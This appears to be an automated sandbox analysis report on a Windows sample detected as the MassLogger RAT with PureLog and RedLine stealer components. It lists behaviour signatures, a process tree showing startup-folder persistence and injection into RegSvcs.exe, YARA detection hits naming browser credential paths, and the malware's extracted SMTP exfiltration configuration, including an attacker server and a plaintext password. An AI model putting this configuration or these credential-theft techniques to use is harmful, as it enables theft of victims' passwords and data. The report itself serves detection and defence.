Edit tour

Windows Analysis Report
7b4Iaf58Rp.exe

Overview

General Information

Sample name:	7b4Iaf58Rp.exe renamed because original name is a hash value
Original sample name:	fff6c4bcd537790156642c7010aac1fddd2a79f3143a71f5570dc19ab9ba25ba.exe
Analysis ID:	1588266
MD5:	1522da1337568f1f00aa81af4a9e345d
SHA1:	7fdb6aeadc77a586f43d08a7a9adda5387933916
SHA256:	fff6c4bcd537790156642c7010aac1fddd2a79f3143a71f5570dc19ab9ba25ba
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

7b4Iaf58Rp.exe (PID: 768 cmdline: "C:\Users\user\Desktop\7b4Iaf58Rp.exe" MD5: 1522DA1337568F1F00AA81AF4A9E345D)

neophobia.exe (PID: 1796 cmdline: "C:\Users\user\Desktop\7b4Iaf58Rp.exe" MD5: 1522DA1337568F1F00AA81AF4A9E345D)

RegSvcs.exe (PID: 2168 cmdline: "C:\Users\user\Desktop\7b4Iaf58Rp.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

neophobia.exe (PID: 1976 cmdline: "C:\Users\user\AppData\Local\scrolar\neophobia.exe" MD5: 1522DA1337568F1F00AA81AF4A9E345D)

RegSvcs.exe (PID: 2344 cmdline: "C:\Users\user\AppData\Local\scrolar\neophobia.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

neophobia.exe (PID: 2080 cmdline: "C:\Users\user\AppData\Local\scrolar\neophobia.exe" MD5: 1522DA1337568F1F00AA81AF4A9E345D)

RegSvcs.exe (PID: 2352 cmdline: "C:\Users\user\AppData\Local\scrolar\neophobia.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 3684 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

neophobia.exe (PID: 3032 cmdline: "C:\Users\user\AppData\Local\scrolar\neophobia.exe" MD5: 1522DA1337568F1F00AA81AF4A9E345D)

RegSvcs.exe (PID: 6840 cmdline: "C:\Users\user\AppData\Local\scrolar\neophobia.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x21db4:$a1: get_encryptedPassword 0x4a0ec:$a1: get_encryptedPassword 0x21d88:$a2: get_encryptedUsername 0x4a0c0:$a2: get_encryptedUsername 0x21e4c:$a3: get_timePasswordChanged 0x4a184:$a3: get_timePasswordChanged 0x21d64:$a4: get_passwordField 0x4a09c:$a4: get_passwordField 0x21dca:$a5: set_encryptedPassword 0x4a102:$a5: set_encryptedPassword 0x21b97:$a7: get_logins 0x49ecf:$a7: get_logins 0x21105:$a8: GetOutlookPasswords 0x4943d:$a8: GetOutlookPasswords 0x20619:$a9: StartKeylogger 0x48951:$a9: StartKeylogger 0x1f073:$a10: KeyLoggerEventArgs 0x473ab:$a10: KeyLoggerEventArgs 0x1f042:$a11: KeyLoggerEventArgsEventHandler 0x4737a:$a11: KeyLoggerEventArgsEventHandler 0x21c6b:$a13: _encryptedPassword
00000007.00000002.2664984338.00000000032F4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5e4fa:$a1: get_encryptedPassword 0x5e4ce:$a2: get_encryptedUsername 0x5e592:$a3: get_timePasswordChanged 0x5e4aa:$a4: get_passwordField 0x5e510:$a5: set_encryptedPassword 0x5e2dd:$a7: get_logins 0x5d84b:$a8: GetOutlookPasswords 0x5cd5f:$a9: StartKeylogger 0x5b7b9:$a10: KeyLoggerEventArgs 0x5b788:$a11: KeyLoggerEventArgsEventHandler 0x5e3b1:$a13: _encryptedPassword
00000006.00000002.1571996988.0000000002320000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C1 88 44 24 2B 88 44 24 2F B0 7B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000004.00000002.1531826494.0000000001490000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C1 88 44 24 2B 88 44 24 2F B0 7B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000B.00000002.2664477879.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb844:$a1: get_encryptedPassword 0xb818:$a2: get_encryptedUsername 0xb8dc:$a3: get_timePasswordChanged 0xb7f4:$a4: get_passwordField 0xb85a:$a5: set_encryptedPassword 0xb627:$a7: get_logins 0xab95:$a8: GetOutlookPasswords 0xa0a9:$a9: StartKeylogger 0x8b03:$a10: KeyLoggerEventArgs 0x8ad2:$a11: KeyLoggerEventArgsEventHandler 0xb6fb:$a13: _encryptedPassword
00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c95c:$a1: get_encryptedPassword 0x1c930:$a2: get_encryptedUsername 0x1c9f4:$a3: get_timePasswordChanged 0x1c90c:$a4: get_passwordField 0x1c972:$a5: set_encryptedPassword 0x1c73f:$a7: get_logins 0x1bcad:$a8: GetOutlookPasswords 0x1b1c1:$a9: StartKeylogger 0x19c1b:$a10: KeyLoggerEventArgs 0x19bea:$a11: KeyLoggerEventArgsEventHandler 0x1c813:$a13: _encryptedPassword
00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2104b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20549:$a3: \Google\Chrome\User Data\Default\Login Data 0x20857:$a4: \Orbitum\User Data\Default\Login Data 0x2164f:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.1495389103.0000000000B40000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C1 88 44 24 2B 88 44 24 2F B0 7B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000B.00000002.2664119117.0000000002763000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.1648249221.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C1 88 44 24 2B 88 44 24 2F B0 7B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
Process Memory Space: RegSvcs.exe PID: 2352	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 2352	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 2352	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 2352	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 2352	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ba8f:$a1: get_encryptedPassword 0x3ba63:$a2: get_encryptedUsername 0x3bb27:$a3: get_timePasswordChanged 0x3ba3f:$a4: get_passwordField 0x3baa5:$a5: set_encryptedPassword 0x3b87b:$a7: get_logins 0x3ae35:$a8: GetOutlookPasswords 0x3a3b3:$a9: StartKeylogger 0x38e7d:$a10: KeyLoggerEventArgs 0x38e4c:$a11: KeyLoggerEventArgsEventHandler 0x3b946:$a13: _encryptedPassword
Process Memory Space: RegSvcs.exe PID: 6840	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6840	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6840	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 6840	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6840	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4cca:$a1: get_encryptedPassword 0x1ed0a:$a1: get_encryptedPassword 0x53172:$a1: get_encryptedPassword 0x4c9e:$a2: get_encryptedUsername 0x1ecde:$a2: get_encryptedUsername 0x53146:$a2: get_encryptedUsername 0x4d62:$a3: get_timePasswordChanged 0x1eda2:$a3: get_timePasswordChanged 0x5320a:$a3: get_timePasswordChanged 0x4c7a:$a4: get_passwordField 0x1ecba:$a4: get_passwordField 0x53122:$a4: get_passwordField 0x4ce0:$a5: set_encryptedPassword 0x1ed20:$a5: set_encryptedPassword 0x53188:$a5: set_encryptedPassword 0x4ab6:$a7: get_logins 0x1eaf6:$a7: get_logins 0x52f5e:$a7: get_logins 0x408e:$a8: GetOutlookPasswords 0x1e0ce:$a8: GetOutlookPasswords 0x52518:$a8: GetOutlookPasswords
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.neophobia.exe.b40000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C1 88 44 24 2B 88 44 24 2F B0 7B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.RegSvcs.exe.391e790.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.391e790.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.391e790.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.391e790.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.391e790.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c95c:$a1: get_encryptedPassword 0x1c930:$a2: get_encryptedUsername 0x1c9f4:$a3: get_timePasswordChanged 0x1c90c:$a4: get_passwordField 0x1c972:$a5: set_encryptedPassword 0x1c73f:$a7: get_logins 0x1bcad:$a8: GetOutlookPasswords 0x1b1c1:$a9: StartKeylogger 0x19c1b:$a10: KeyLoggerEventArgs 0x19bea:$a11: KeyLoggerEventArgsEventHandler 0x1c813:$a13: _encryptedPassword
11.2.RegSvcs.exe.391e790.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2104b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20549:$a3: \Google\Chrome\User Data\Default\Login Data 0x20857:$a4: \Orbitum\User Data\Default\Login Data 0x2164f:$a5: \Kometa\User Data\Default\Login Data
11.2.RegSvcs.exe.38f6458.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.38f6458.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.38f6458.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.38f6458.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.38f6458.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ab5c:$a1: get_encryptedPassword 0x1ab30:$a2: get_encryptedUsername 0x1abf4:$a3: get_timePasswordChanged 0x1ab0c:$a4: get_passwordField 0x1ab72:$a5: set_encryptedPassword 0x1a93f:$a7: get_logins 0x19ead:$a8: GetOutlookPasswords 0x193c1:$a9: StartKeylogger 0x17e1b:$a10: KeyLoggerEventArgs 0x17dea:$a11: KeyLoggerEventArgsEventHandler 0x1aa13:$a13: _encryptedPassword
11.2.RegSvcs.exe.38f6458.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f24b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e749:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ea57:$a4: \Orbitum\User Data\Default\Login Data 0x1f84f:$a5: \Kometa\User Data\Default\Login Data
11.2.RegSvcs.exe.2591b9e.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.2591b9e.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.2591b9e.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.2591b9e.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.2591b9e.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c95c:$a1: get_encryptedPassword 0x1c930:$a2: get_encryptedUsername 0x1c9f4:$a3: get_timePasswordChanged 0x1c90c:$a4: get_passwordField 0x1c972:$a5: set_encryptedPassword 0x1c73f:$a7: get_logins 0x1bcad:$a8: GetOutlookPasswords 0x1b1c1:$a9: StartKeylogger 0x19c1b:$a10: KeyLoggerEventArgs 0x19bea:$a11: KeyLoggerEventArgsEventHandler 0x1c813:$a13: _encryptedPassword
11.2.RegSvcs.exe.2591b9e.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2104b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20549:$a3: \Google\Chrome\User Data\Default\Login Data 0x20857:$a4: \Orbitum\User Data\Default\Login Data 0x2164f:$a5: \Kometa\User Data\Default\Login Data
11.2.RegSvcs.exe.391e790.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.391e790.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.391e790.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.391e790.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.391e790.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ab5c:$a1: get_encryptedPassword 0x1ab30:$a2: get_encryptedUsername 0x1abf4:$a3: get_timePasswordChanged 0x1ab0c:$a4: get_passwordField 0x1ab72:$a5: set_encryptedPassword 0x1a93f:$a7: get_logins 0x19ead:$a8: GetOutlookPasswords 0x193c1:$a9: StartKeylogger 0x17e1b:$a10: KeyLoggerEventArgs 0x17dea:$a11: KeyLoggerEventArgsEventHandler 0x1aa13:$a13: _encryptedPassword
11.2.RegSvcs.exe.391e790.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f24b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e749:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ea57:$a4: \Orbitum\User Data\Default\Login Data 0x1f84f:$a5: \Kometa\User Data\Default\Login Data
4.2.neophobia.exe.1490000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C1 88 44 24 2B 88 44 24 2F B0 7B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.RegSvcs.exe.2591b9e.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.2591b9e.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.2591b9e.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.2591b9e.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.2591b9e.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ab5c:$a1: get_encryptedPassword 0x1ab30:$a2: get_encryptedUsername 0x1abf4:$a3: get_timePasswordChanged 0x1ab0c:$a4: get_passwordField 0x1ab72:$a5: set_encryptedPassword 0x1a93f:$a7: get_logins 0x19ead:$a8: GetOutlookPasswords 0x193c1:$a9: StartKeylogger 0x17e1b:$a10: KeyLoggerEventArgs 0x17dea:$a11: KeyLoggerEventArgsEventHandler 0x1aa13:$a13: _encryptedPassword
11.2.RegSvcs.exe.2591b9e.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f24b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e749:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ea57:$a4: \Orbitum\User Data\Default\Login Data 0x1f84f:$a5: \Kometa\User Data\Default\Login Data
11.2.RegSvcs.exe.38f5570.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.38f5570.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.38f5570.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.38f5570.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.38f5570.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d844:$a1: get_encryptedPassword 0x45b7c:$a1: get_encryptedPassword 0x1d818:$a2: get_encryptedUsername 0x45b50:$a2: get_encryptedUsername 0x1d8dc:$a3: get_timePasswordChanged 0x45c14:$a3: get_timePasswordChanged 0x1d7f4:$a4: get_passwordField 0x45b2c:$a4: get_passwordField 0x1d85a:$a5: set_encryptedPassword 0x45b92:$a5: set_encryptedPassword 0x1d627:$a7: get_logins 0x4595f:$a7: get_logins 0x1cb95:$a8: GetOutlookPasswords 0x44ecd:$a8: GetOutlookPasswords 0x1c0a9:$a9: StartKeylogger 0x443e1:$a9: StartKeylogger 0x1ab03:$a10: KeyLoggerEventArgs 0x42e3b:$a10: KeyLoggerEventArgs 0x1aad2:$a11: KeyLoggerEventArgsEventHandler 0x42e0a:$a11: KeyLoggerEventArgsEventHandler 0x1d6fb:$a13: _encryptedPassword
11.2.RegSvcs.exe.38f5570.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21f33:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a26b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21431:$a3: \Google\Chrome\User Data\Default\Login Data 0x49769:$a3: \Google\Chrome\User Data\Default\Login Data 0x2173f:$a4: \Orbitum\User Data\Default\Login Data 0x49a77:$a4: \Orbitum\User Data\Default\Login Data 0x22537:$a5: \Kometa\User Data\Default\Login Data 0x4a86f:$a5: \Kometa\User Data\Default\Login Data
11.2.RegSvcs.exe.2590cb6.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.2590cb6.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.2590cb6.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.2590cb6.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
